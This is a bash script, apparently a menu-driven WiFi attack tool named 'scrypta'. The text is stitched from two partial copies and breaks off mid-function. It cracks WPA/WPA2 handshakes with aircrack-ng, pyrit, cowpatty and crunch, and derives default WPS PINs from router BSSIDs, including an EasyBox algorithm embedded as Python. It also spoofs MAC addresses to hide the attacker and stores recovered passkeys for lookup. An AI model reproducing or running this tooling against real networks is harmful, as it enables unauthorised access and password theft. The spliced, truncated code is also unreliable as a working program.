  1237. echo $STAND"pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough"
  1238. echo
  1239. # Launch chosen commands/options
  1240. #################################
  1241. read -p $GREEN"Press enter to start"$STAND
  1242. clear
  1243. pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough
  1244.                  fi
        # Option 3: the wordlist is piped through pyrit passthrough into cowpatty; the
        # ESSID is passed to both tools.
  1245.                  if [[ $option == "3" ]]; then
  1246.                                   clear
  1247. echo $RED
  1248. echo "############################################################################"
  1249. echo "#                                                                          #"
  1250. echo "#$STAND                   Attack Capture File Using A Wordlist                   $RED#"
  1251. echo "#$STAND                            (Pyrit + Cowpatty)                            $RED#"
  1252. echo "#                                                                          #"
  1253. echo "############################################################################"$STAND
  1254. echo
  1255. echo $RED"eg: sky12345"
  1256. read -p $GREEN"Access Point essid$STAND: " essid
  1257. echo
  1258. echo $RED"eg: /root/Desktop/sky12345.cap"
  1259. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  1260. echo
  1261. echo $RED"eg: /root/Desktop/wordlist.txt"
  1262. read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
  1263. clear
  1264. # Chosen user input options
  1265. ############################
  1266. echo
  1267. echo $RED"You've chosen:"
  1268. echo "=============="
  1269. echo $RED"Access Point essid$STAND: $essid"
  1270. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  1271. echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
  1272. echo
  1273. echo $RED"Commands to launch:"
  1274. echo "==================="
  1275. echo $STAND"cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
  1276. echo
  1277. # Launch chosen commands/options
  1278. #################################
  1279. read -p $GREEN"Press enter to start"$STAND
  1280. clear
  1281. cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
  1282.                  fi
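  if [[ $option == "4" ]]; then
    # Option 4 of the capture-file menu: no wordlist file. crunch generates the
    # candidates and they are piped to aircrack-ng, which is told to read its
    # wordlist from stdin ("-w -").
    #
    # Fixed here: the first command of this branch was spelled "lear", so bash
    # reported "command not found" and the previous menu stayed on screen. The
    # prompts now use read -r so backslashes in typed paths are kept literally.
    clear
    echo "$RED"
    echo "############################################################################"
    echo "#                                                                          #"
    echo "#$STAND           Attack a Capture file without using a wordlist file            $RED#"
    echo "#$STAND                          (Crunch + Aircrack-ng)                          $RED#"
    echo "#                                                                          #"
    echo "############################################################################$STAND"
    echo
    echo "${RED}eg: abcdef23456789"
    read -r -p "${GREEN}Input the characters, digits, or symbols to be used${STAND}: " CharacterSet
    echo
    echo "${RED}eg: 10"
    read -r -p "${GREEN}Input the minimum length of the passwords${STAND}: " PasswordLengthMin
    echo
    echo "${RED}eg: 10"
    read -r -p "${GREEN}Input the maximum length of the passwords${STAND}: " PasswordLengthMax
    echo
    echo "${RED}eg:"
    echo "${RED}-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
    echo "${RED}-s XXXXXXXXXX = Start point."
    read -r -p "${GREEN}Input any other optional crunch commands?${STAND}: " OptionalCrunchOptions
    echo
    echo "${RED}eg: sky12345"
    read -r -p "${GREEN}Access Point essid${STAND}: " essid
    echo
    echo "${RED}eg: /root/Desktop/sky12345.cap"
    read -r -p "${GREEN}Capture file location, name, extension${STAND}: " CapNameLocation
    clear

    # Echo the collected inputs and the exact command line before running it.
    echo
    echo "${RED}You've chosen:"
    echo "=============="
    echo "${RED}Minimum length password${STAND}: $PasswordLengthMin"
    echo "${RED}Maximum length of password${STAND}: $PasswordLengthMax"
    echo "${RED}Characters, digits, symbols to be used in the passwords${STAND}: $CharacterSet"
    echo "${RED}Other crunch commands?${STAND}: $OptionalCrunchOptions"
    echo "${RED}Capture file location, name, extension${STAND}: $CapNameLocation"
    echo "${RED}essid${STAND}: $essid"
    echo
    echo "${RED}Commands to launch:"
    echo "==================="
    echo "${STAND}crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -"
    echo

    read -r -p "${GREEN}Press enter to start${STAND}"
    clear
    # The command line is unchanged from the original. $OptionalCrunchOptions
    # relies on word splitting to become separate arguments; the other values are
    # split the same way, so a path or ESSID containing spaces breaks the call.
    crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -
  fi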
  1335.                  if [[ $option == "5" ]]; then
        # Option 5: candidates generated by crunch are piped to pyrit attack_passthrough,
        # which reads them from stdin ("-i -") and checks them against the capture file.
        # The prompts and the confirmation screen mirror the other crunch-based branches.
        # NOTE(review): $OptionalCrunchOptions is deliberately left to word splitting so
        # that it becomes separate arguments; the same splitting applies to the path and
        # ESSID, which therefore must not contain spaces.
  1336.                                   clear
  1337. echo $RED
  1338. echo "############################################################################"
  1339. echo "#                                                                          #"
  1340. echo "#$STAND           Attack a Capture file without using a wordlist file            $RED#"
  1341. echo "#$STAND                             (Crunch + Pyrit)                             $RED#"
  1342. echo "#                                                                          #"
  1343. echo "############################################################################"$STAND
  1344. echo
  1345. echo $RED"eg: abcdef23456789"
  1346. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
  1347. echo
  1348. echo $RED"eg: 10"
  1349. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
  1350. echo
  1351. echo $RED"eg: 10"
  1352. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
  1353. echo
  1354. echo $RED"eg:"
  1355. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
  1356. echo $RED"-s XXXXXXXXXX = Start point."
  1357. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
  1358. echo
  1359. echo $RED"eg: sky12345"
  1360. read -p $GREEN"Access Point essid$STAND: " essid
  1361. echo
  1362. echo $RED"eg: /root/Desktop/sky12345.cap"
  1363. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  1364. clear
  1365. # Chosen user input options
  1366. ############################
  1367. echo
  1368. echo $RED"You've chosen:"
  1369. echo "=============="
  1370. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
  1371. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
  1372. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
  1373. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
  1374. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  1375. echo $RED"essid$STAND: $essid"
  1376. echo
  1377. echo $RED"Commands to launch:"
  1378. echo "==================="
  1379. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough"
  1380. echo
  1381. # Launch chosen commands/options
  1382. #################################
  1383. read -p $GREEN"Press enter to start"$STAND
  1384. clear
  1385. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough
  1386.                  fi
        # Option 6: three-stage pipeline, crunch -> pyrit passthrough -> cowpatty, with the
        # ESSID given to both pyrit (-e) and cowpatty (-s).
  1387.                  if [[ $option == "6" ]]; then
  1388.                                   clear
  1389. echo $RED
  1390. echo "############################################################################"
  1391. echo "#                                                                          #"
  1392. echo "#$STAND           Attack a Capture file without using a wordlist file            $RED#"
  1393. echo "#$STAND                       (Crunch + Pyrit + Cowpatty)                        $RED#"
  1394. echo "#                                                                          #"
  1395. echo "############################################################################"$STAND
  1396. echo
  1397. echo $RED"eg: abcdef23456789"
  1398. read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
  1399. echo
  1400. echo $RED"eg: 10"
  1401. read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
  1402. echo
  1403. echo $RED"eg: 10"
  1404. read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
  1405. echo
  1406. echo $RED"eg:"
  1407. echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
  1408. echo $RED"-s XXXXXXXXXX = Start point."
  1409. read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
  1410. echo
  1411. echo $RED"eg: sky12345"
  1412. read -p $GREEN"Access Point essid$STAND: " essid
  1413. echo
  1414. echo $RED"eg: /root/Desktop/sky12345.cap"
  1415. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  1416. clear
  1417. # Chosen user input options
  1418. ############################
  1419. echo
  1420. echo $RED"You've chosen:"
  1421. echo "=============="
  1422. echo $RED"Minimum length password$STAND: $PasswordLengthMin"
  1423. echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
  1424. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
  1425. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
  1426. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  1427. echo $RED"essid$STAND: $essid"
  1428. echo
  1429. echo $RED"Commands to launch:"
  1430. echo "==================="
  1431. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
  1432. echo
  1433. # Launch chosen commands/options
  1434. #################################
  1435. read -p $GREEN"Press enter to start"$STAND
  1436. clear
  1437. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
  1438. fi
  1439. ;;
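  7)
    # Show recovered passkeys: open the plain-text results file in the desktop's
    # default viewer via gnome-open.
    # The path is quoted so a $HOME containing spaces is passed as one argument,
    # and a missing file is reported here instead of being handed to gnome-open.
    # The pause keeps the message visible, because the menu loop clears the screen
    # on its next pass.
    passkey_file="$HOME/scrypta/Recovered-WPA-Passkeys.txt"
    if [[ -f "$passkey_file" ]]; then
      gnome-open "$passkey_file"
    else
      echo "No recovered passkeys file found at $passkey_file"
      read -r -p "Press [Enter] to continue. . ."
    fi
    ;;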
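  8)
    # Passkey checker: look up an access point in Recovered-WPA-Passkeys.txt by
    # BSSID or ESSID and print the matching record.
    # Records are written elsewhere in the script as four lines (ESSID, BSSID,
    # passkey, blank), which is why the BSSID search prints one line before and two
    # after the match and the ESSID search prints three lines after it.
    #
    # Changes from the original:
    #   - the search term is quoted and passed after "--", so input with spaces or a
    #     leading "-" is one literal pattern and not several arguments or an option;
    #   - grep -F matches the term literally ("." in an ESSID or MAC is not a regex);
    #   - an empty term is skipped; unquoted, it made grep take the file name as the
    #     pattern and wait on stdin;
    #   - read -r keeps backslashes, and EOF on the confirm prompt ends the loop.
    # The file holds recovered keys in clear text; nothing here restricts who can
    # read it.
    clear
    echo "${RED}How would you like to search."
    echo "${GREEN}[1]${BLUE} = Search using the bssid."
    echo "${GREEN}[2]${BLUE} = Search using the essid."
    echo "${GREEN}[0]${BLUE} = Return To Previous Menu."
    echo "${GREEN}1, 2 or 0?${STAND}"
    read -r option

    if [[ $option == "1" ]]; then
      while true; do
        echo -n "${GREEN}Please input the bssid of the access point you would like to check for?${STAND}: "
        read -r -e SEARCHbssid
        if [[ -n $SEARCHbssid ]]; then
          grep -F -B 1 -A 2 -- "$SEARCHbssid" "$HOME/scrypta/Recovered-WPA-Passkeys.txt"
        fi
        echo
        echo -n "Would you like to search again? (y or n): "
        read -r -e CONFIRM || break
        case $CONFIRM in
          n | N | NO | no | No) break ;;
          *) echo "" ;;
        esac
      done
    fi
    if [[ $option == "2" ]]; then
      while true; do
        echo -n "${GREEN}Please input the essid of the access point you would like to check for?${STAND}: "
        read -r -e SEARCHessid
        if [[ -n $SEARCHessid ]]; then
          grep -F -A 3 -- "$SEARCHessid" "$HOME/scrypta/Recovered-WPA-Passkeys.txt"
        fi
        echo
        echo -n "Would you like to search again? (y or n): "
        read -r -e CONFIRM || break
        case $CONFIRM in
          n | N | NO | no | No) break ;;
          *) echo "" ;;
        esac
      done
    fi
    if [[ $option == "0" ]]; then
      echo "Returning To Menu"
    fi
    ;;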
  1497. 0) exit 0;;
  1498. *) echo "You've chosen an invalid option, please choose again";
  1499. echo "Press [Enter] to continue. . ." ; read ;;
  1500. esac
  1501. done#!/bin/bash
  1502.  
  1503.  
  1504.  
  # Terminal escape sequences captured from tput and interpolated into the
  # menu/prompt echo lines. RED, GREEN and BLUE each combine a foreground
  # colour (setaf 1, 2 and 6) with bold; STAND resets all attributes.
  # The inner "&&" means bold is only appended when the setaf call succeeded.
  STAND="$(tput sgr0)"
  RED="$(tput setaf 1 && tput bold)"
  GREEN="$(tput setaf 2 && tput bold)"
  BLUE="$(tput setaf 6 && tput bold)"
  1509.  
  1510. while :
  1511. do
  1512.  
  1513. ###### Create scrypta storage folder if it doesn't exist ######
  1514.  
  1515. if [ -d $HOME/scrypta ];
  1516. then
  1517.    echo ""
  1518. else
  1519.    mkdir $HOME/scrypta
  1520.    mkdir $HOME/scrypta/temp
  1521.    mkdir $HOME/scrypta/Captured_Handshakes
  1522.    mkdir $HOME/scrypta/Client_Scans
  1523. fi
  1524.  
  1525. ###### Delete Missed Files In The Temp Directory ######
  1526.  
  1527.    rm $HOME/scrypta/temp/*.txt &> /dev/null
  1528.    rm $HOME/scrypta/temp/*.py &> /dev/null
  1529.    rm $HOME/scrypta/temp/*.ivs &> /dev/null
  1530.    rm $HOME/scrypta/temp/*.cap &> /dev/null
  1531.    rm $HOME/scrypta/temp/*.xor &> /dev/null
  1532.    rm $HOME/scrypta/temp/*.csv &> /dev/null
  1533.    rm $HOME/scrypta/temp/*.netxml &> /dev/null
  1534.    rm $HOME/scrypta/temp/arp-packet &> /dev/null
  1535.    rm $HOME/scrypta/temp/*.sh &> /dev/null
  1536.  
  1537. ###### START OF: DETECT mon0 MAC ADDRESS AND THEN DISPLAY SYSTEM MODE STATUS ######
  1538.  
  1539. mon0mac=$(ip addr | grep "radiotap" | cut -c 30-46)
  1540.  
  1541. if [ -s $mon0mac ]
  1542. then
  1543.    MonitorModeStatus=$(echo Networking Mode Enabled)
  1544. else
  1545.    MonitorModeStatus=$(echo Attack Mode Enabled)
  1546. fi
  1547.  
  1548. ###### System Environment Options Menu ######
  1549. clear
  1550. echo $RED"#########################################"
  1551. echo "#   $STAND          scrypta             $RED#"
  1552. echo "#########################################"
  1553. echo "#                                       #"
  1554. echo "#$GREEN [1]$BLUE WiFi Adapter Selection            $RED#"
  1555. echo "#$GREEN [2]$BLUE Enable Attack Or Networking Mode  $RED#"
  1556. echo "#$GREEN [3]$BLUE Attack A WPS Enabled Access Point $RED#"
  1557. echo "#$GREEN [4]$BLUE Capture WPA/WPA2 Handshake        $RED#"
  1558. echo "#$GREEN [5]$BLUE WEP Attacks                       $RED#"
  1559. echo "#$GREEN [6]$BLUE Attack Handshake.cap Files        $RED#"
  1560. echo "#$GREEN [7]$BLUE Show Recovered Passkeys           $RED#"
  1561. echo "#$GREEN [8]$BLUE Recovered Passkey Checker         $RED#"
  1562. echo "#                                       #"
  1563. echo "#########################################"
  1564. echo ""
  1565. echo "Chosen Interface$STAND: $wlanX"
  1566. echo $RED"System Mode$STAND: $MonitorModeStatus"
  1567. echo $RED"MAC address for mon0$STAND: $mon0mac"
  1568. echo ""
  1569. read -s -n1 -p $GREEN"Please choose an option?$STAND: " ChosenOption
  1570. echo
  1571. case $ChosenOption in
  1572.  
  1573. 1)
  1574. ###### [1] START OF: CHOOSE A WIFI ADAPTER ######
  1575.  
  1576. cd $HOME/scrypta/temp
  1577. clear
  1578. Presented_WiFi_Adapters=$(airmon-ng | grep "wlan" | cut -c 1-5 | nl -ba -w 1  -s ": ")
  1579. clear
  1580. echo $RED"Available WiFi Adapters.$STAND"
  1581. echo ""
  1582. echo "$Presented_WiFi_Adapters"
  1583. echo ""
  1584. read -s -n1 -p $GREEN"Please input the number of your chosen WiFi adapter:$STAND " grep_Line_Number
  1585. wlanX=$(echo $Presented_WiFi_Adapters | sed -n ""$grep_Line_Number"p" | cut -c 4-8)
  1586. echo ""
  1587. echo ""
  1588. echo $RED"You've chosen:$STAND $wlanX"
  1589. sleep 1
  1590. cd
  1591.  
  1592. ;;
  1593.  
  1594. ###### [1] END OF: CHOOSE A WIFI ADAPTER ######
  1595.  
  1596. 2)
  1597. ###### [2] START OF: ENABLE NETWORKING OR ATTACK MODE ######
  1598.  
  1599. clear
  1600. echo $RED"#########################################"
  1601. echo "#                                       #"
  1602. echo "# $GREEN[1]$BLUE Enable Networking Mode           $RED #"
  1603. echo "# $GREEN[2]$BLUE Enable Attack Mode               $RED #"
  1604. echo "# $GREEN[0]$BLUE Return To Main Menu              $RED #"
  1605. echo "#                                       #"
  1606. echo "#########################################$STAND"
  1607. echo ""
  1608. read -s -n1 -p $GREEN"Choose an option, 1 or 2?:$STAND " option
  1609. if [[ $option == "1" ]]; then
  1610.    clear
  1611.    echo $RED"Putting the system into networking mode$STAND"
  1612.    airmon-ng stop mon5 > /dev/null
  1613.    airmon-ng stop mon4 > /dev/null
  1614.    airmon-ng stop mon3 > /dev/null
  1615.    airmon-ng stop mon2 > /dev/null
  1616.    airmon-ng stop mon1 > /dev/null
  1617.    airmon-ng stop mon0 > /dev/null
  1618.    airmon-ng stop wlanX
  1619.    echo $RED"Please wait...$STAND"
  1620.    ifconfig $wlanX down
  1621.    ifconfig $wlanX down
  1622.    wlanFakeMAC=$(macchanger -r $wlanX | grep "New" | cut -c 16-32)
  1623.    ifconfig $wlanX hw ether $wlanFakeMAC
  1624.    ifconfig $wlanX up
  1625.    sleep 1
  1626.    service network-manager start
  1627.    echo ""
  1628.    echo $RED"Networking mode should now be enabled, A fake MAC address has also been set.$STAND"
  1629.    sleep 3
  1630.    fi
  1631.  
  1632. if [[ $option == "2" ]]; then
  1633.    clear
  1634.    echo $RED"Putting the system into attack mode$STAND"
  1635.    echo $RED"Please wait...$STAND"
  1636.    echo ""
  1637.    airmon-ng stop mon5 > /dev/null
  1638.    airmon-ng stop mon4 > /dev/null
  1639.    airmon-ng stop mon3 > /dev/null
  1640.    airmon-ng stop mon2 > /dev/null
  1641.    airmon-ng stop mon1 > /dev/null
  1642.    airmon-ng stop mon0 > /dev/null
  1643.    ifconfig $wlanX down
  1644.  
  1645. read -s -n1 -p $GREEN"Would you like to disable processes that might cause issue's Y/n?.$STAND " KillProcesses
  1646. if [[ $KillProcesses == "Y" || $KillProcesses == "y" ]]; then
  1647.    echo ""
  1648.    echo $RED"Please wait...$STAND"
  1649.    kill `pidof NetworkManager`
  1650.    sleep 2
  1651.    kill `pidof wpa_supplicant`
  1652.    sleep 2                
  1653. fi
  1654.  
  1655.    ifconfig $wlanX up
  1656.    sleep 1
  1657.    airmon-ng start $wlanX
  1658.    echo $RED"Please wait...$STAND"
  1659.    sleep 1
  1660.    ifconfig $wlanX down
  1661.    sleep 1
  1662.    ifconfig mon0 down
  1663.    wlanMAC1=$(macchanger -r $wlanX | grep "New" | cut -c 16-32)
  1664.    ifconfig $wlanX hw ether $wlanMAC1
  1665.    echo ""
  1666.    sleep 1
  1667.    macchanger --mac $wlanMAC1 mon0 > /dev/null
  1668.    ifconfig $wlanX up
  1669.    ifconfig mon0 up
  1670.    echo ""
  1671.    echo $RED"MAC address for $wlanX:$STAND"
  1672.    macchanger -s $wlanX
  1673.    echo ""
  1674.    echo $RED"MAC address for mon0:$STAND"
  1675.    macchanger -s mon0
  1676.    echo ""
  1677.    echo $RED"A Random MAC address has been set,$STAND "$wlanX"$RED and$STAND mon0$RED should now have the same fake MAC address.$STAND"
  1678.    echo ""
  1679.    echo $RED"Attack Mode Should Now Be Enabled.$STAND"
  1680.    sleep 3
  1681. fi
  1682.  
  1683. ;;
  1684.  
  1685. ###### [2] END OF: ENABLE NETWORKING OR ATTACK MODE ######
  1686.  
  1687. 3)
  1688. ###### [3] Attack A WPS Enabled Access Point ######
  1689. cd $HOME/scrypta/temp
  1690. clear
  1691. ############## Start Of Create WPSpin.py And easybox_wps.py ##############
  1692.  
  1693. ############## WPSpin.py ##############
  1694. echo '
  1695. import sys
  1696.  
  1697. VERSION    = 1
  1698. SUBVERSION = 0
  1699.  
  1700. def usage():
  1701.     print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
  1702.     print "[*] Usage : python WPSpin.py 123456"
  1703.     sys.exit(0)
  1704.  
  1705. def wps_pin_checksum(pin):
  1706.     accum = 0
  1707.  
  1708.     while(pin):
  1709.         accum += 3 * (pin % 10)
  1710.         pin /= 10
  1711.         accum += pin % 10
  1712.         pin /= 10
  1713.     return  (10 - accum % 10) % 10
  1714.  
  1715. try:
  1716.     if (len(sys.argv[1]) == 6):
  1717.         p = int(sys.argv[1] , 16) % 10000000
  1718.         print "[+] WPS pin might be : %07d%d" % (p, wps_pin_checksum(p))
  1719.     else:
  1720.         usage()
  1721. except Exception:
  1722.     usage()
  1723. ' > WPSpin.py
  1724.  
  1725. ############## easybox_wps.py ##############
  1726.  
  1727. echo '#!/usr/bin/env python
  1728. import sys, re
  1729.  
  1730. def gen_pin (mac_str, sn):
  1731.     mac_int = [int(x, 16) for x in mac_str]
  1732.     sn_int = [0]*5+[int(x) for x in sn[5:]]
  1733.     hpin = [0] * 7
  1734.    
  1735.     k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
  1736.     k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
  1737.     hpin[0] = k1 ^ sn_int[9];
  1738.     hpin[1] = k1 ^ sn_int[8];
  1739.     hpin[2] = k2 ^ mac_int[9];
  1740.     hpin[3] = k2 ^ mac_int[10];
  1741.     hpin[4] = mac_int[10] ^ sn_int[9];
  1742.     hpin[5] = mac_int[11] ^ sn_int[8];
  1743.     hpin[6] = k1 ^ sn_int[7];
  1744.     pin = int("%1X%1X%1X%1X%1X%1X%1X" % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 10000000
  1745.  
  1746.     # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
  1747.         # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc    
  1748.     accum = 0
  1749.     t = pin
  1750.     while (t):
  1751.         accum += 3 * (t % 10)
  1752.         t /= 10
  1753.         accum += t % 10
  1754.         t /= 10
  1755.     return "%i%i" % (pin, (10 - accum % 10) % 10)
  1756.  
  1757. def main():
  1758.     if len(sys.argv) != 2:
  1759.         sys.exit("usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n")
  1760.        
  1761.     mac_str = re.sub(r"[^a-fA-F0-9]", "", sys.argv[1])
  1762.     if len(mac_str) != 12:
  1763.         sys.exit("check MAC format!\n")
  1764.        
  1765.     sn = "R----%05i" % int(mac_str[8:12], 16)
  1766.     print "derived serial number:", sn
  1767.     print "SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c" % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9])        
  1768.     print "WPS pin:", gen_pin(mac_str, sn)
  1769.  
  1770. if __name__ == "__main__":
  1771.     main()
  1772. ' > easybox_wps.py
  1773.  
  1774. ############## End Of Create WPSpin.py And easybox_wps.py ##############
  1775.  
  1776. ############## Start Of Target Selection And Pin Generation ##############
  1777.  
  1778. clear
  1779. echo $RED"Scanning for WPS-enabled access points, press Ctrl+c on the wash screen to stop the scan and choose a target."$STAND
  1780. read -p $GREEN"Press [Enter] to launch the scan.$STAND"
  1781. xterm -geometry 111x24+650+0 -l -lf WashScan.txt -e wash -i mon0
  1782. sed -i ''1,6d';'$d'' WashScan.txt
  1783.  
  1784. ############## Start Of Loop Section ##############
  1785.  
  1786. while true
  1787. do
  1788.  
  1789. Presented_APs=$(cat WashScan.txt | awk '{ print $6 }' | nl -ba -w 1  -s ': ' | sed '$d')
  1790. clear
  1791. echo $RED"Available Access Points."$STAND
  1792. echo ""
  1793. echo "$Presented_APs"
  1794. echo ""
  1795. read -p $GREEN"Please input the number of your chosen target:$STAND " grep_AP_line_number
  1796.  
  1797. Chosen_AP_Line=$(cat WashScan.txt | sed -n ""$grep_AP_line_number"p")
  1798. AP_essid=$(echo $Chosen_AP_Line | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  1799. AP_bssid=$(echo $Chosen_AP_Line | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  1800. AP_channel=$(echo $Chosen_AP_Line | awk '{ print $2 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  1801. PinMAC1=$(echo $AP_bssid | sed 's/://g' | cut -c 7-12)
  1802. PinMAC2=$(echo $AP_bssid | sed 's/://g' | cut -c 1-6)
  1803. WPSpin1=`python WPSpin.py $PinMAC1 | awk '{ print $7 }'`
  1804. WPSpin2=`python WPSpin.py $PinMAC2 | awk '{ print $7 }'`
  1805. easybox=`python easybox_wps.py $AP_bssid | grep "WPS pin" | cut -c 10-17`
  1806.  
  1807. ############## End Of Target Selection And Pin Generation ##############
  1808.  
  1809. ############## Start Of Choose A MAC Address Options ##############
  1810.  
  1811. clear
  1812. echo $RED"Please choose a MAC address option:$STAND"
  1813. echo $GREEN"[1]$BLUE = Auto Set A Random MAC address.$STAND"
  1814. echo $GREEN"[2]$BLUE = Input Any MAC Address You Want To Use.$STAND"
  1815. echo $GREEN"[3]$BLUE = Continue Without Changing The MAC Address.$STAND"
  1816. read -s -n1 -p $GREEN"Please choose 1, 2, or 3?$STAND: " option
  1817.  
  1818. if [[ $option == "1" ]]; then
  1819.    clear
  1820.    echo $RED"Auto Setting A Random MAC Address.$STAND"
  1821.    echo $RED"Please wait..."$STAND
  1822.    ifconfig $wlanX down
  1823.    ifconfig $wlanX down
  1824.    sleep 1
  1825.    ifconfig mon0 down
  1826.    wlanMAC2=`macchanger -r $wlanX | grep "New" | cut -c 16-32`
  1827.    ifconfig $wlanX hw ether $wlanMAC2
  1828.    echo ""
  1829.    sleep 1
  1830.    macchanger --mac $wlanMAC2 mon0
  1831.    ifconfig $wlanX up
  1832.    ifconfig mon0 up
  1833.    echo ""
  1834.    echo $RED"MAC address for$STAND $wlanX:"
  1835.    macchanger -s $wlanX
  1836.    echo ""
  1837.    echo $RED"MAC address for$STAND mon0:"
  1838.    macchanger -s mon0
  1839.    echo ""
  1840.    echo $RED"A Random MAC address has been set,$STAND $wlanX$RED and$STAND mon0$RED should now have the same fake MAC address."
  1841.    echo ""
  1842.    sleep 4
  1843.    fi
  1844.  
  1845. if [[ $option == "2" ]]; then
  1846.    clear
  1847.    echo $RED"Set A User specified MAC Address.$STAND"
  1848.    echo $RED"Please wait..."$STAND
  1849.    ifconfig $wlanX down
  1850.    ifconfig mon0 down
  1851.    echo ""
  1852.    echo $RED"Setting a random MAC address."$STAND
  1853.    macchanger -r $wlanX
  1854.    echo ""
  1855.    read -p $GREEN"Input any mac address you want to use?.$STAND " SpecifiedInterfaceMAC
  1856.    ifconfig $wlanX hw ether $SpecifiedInterfaceMAC
  1857.    macchanger --mac $SpecifiedInterfaceMAC mon0
  1858.    ifconfig $wlanX up
  1859.    ifconfig mon0 up
  1860.    echo ""
  1861.    echo $RED"MAC address for$STAND $wlanX:"$STAND
  1862.    macchanger -s $wlanX
  1863.    echo ""
  1864.    echo $RED"MAC address for$STAND mon0:"$STAND
  1865.    macchanger -s mon0
  1866.    echo ""
  1867.    sleep 2
  1868.    echo $RED"A User specified MAC Address has been set, $wlanX and $monX should now have the same fake MAC address."$STAND
  1869.    echo ""
  1870.    echo $RED"Attack Mode Should Now Be Enabled."$STAND
  1871.    sleep 2
  1872.    fi
  1873.  
  1874. if [[ $option == "3" ]]; then
  1875.    echo ""
  1876. fi
  1877.  
  1878. ############## End Of Choose A MAC Address Options ##############
  1879.  
  1880. ############## Start Of Review Information ##############
  1881.  
  1882. clear
  1883. echo $RED"Review Information."$STAND
  1884. echo ""
  1885. echo $RED"You've chosen$BLUE essid$RED:$STAND $AP_essid"
  1886. echo $RED"You've chosen$BLUE bssid$RED:$STAND $AP_bssid"
  1887. echo $RED"You've chosen$BLUE Channel$RED:$STAND $AP_channel"
  1888. echo ""
  1889. echo $RED"Possible$BLUE WPS Pin1$RED:$STAND $WPSpin1"
  1890. echo $RED"Possible$BLUE WPS Pin2$RED:$STAND $WPSpin2"
  1891. echo $RED"Possible$BLUE easybox Pin$RED:$STAND $easybox"
  1892. ############## Start Of WPSPIN-1.3 Default Pin Generator ##############
  1893.  
  1894. ESSID=$(echo $AP_essid)
  1895. BSSID=$(echo $AP_bssid)
  1896.  
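  #######################################
  # Append the check digit to the global PIN and re-verify the result.
  #
  # PIN is read as an (at most) 8-digit decimal number whose units digit is
  # expected to be 0 (callers build it as 10 * <7-digit value>). The seven
  # leading digits are summed with alternating weights 3,1,3,1,3,1,3; the
  # check digit is (10 - sum % 10) % 10 and is added to PIN. A second pass
  # over all eight digits (units digit weighted 1) leaves the remainder in
  # RESTE, which is 0 for a well-formed PIN.
  #
  # Because the eighth digit is fully determined by the first seven, it adds
  # no entropy to the PIN.
  #
  # Globals:
  #   PIN      (read, then overwritten with PIN + check digit)
  #   ACCUM    (written: weighted sum from the second pass)
  #   DIGIT    (written: first-pass sum modulo 10)
  #   CHECKSUM (written: the check digit)
  #   RESTE    (written: second-pass sum modulo 10)
  # Arguments: none
  # Returns:   0; the exit status carries no information (the calls visible
  #            in this script ignore it).
  #######################################
  FUNC_CHECKSUM(){
    local pin divisor weight

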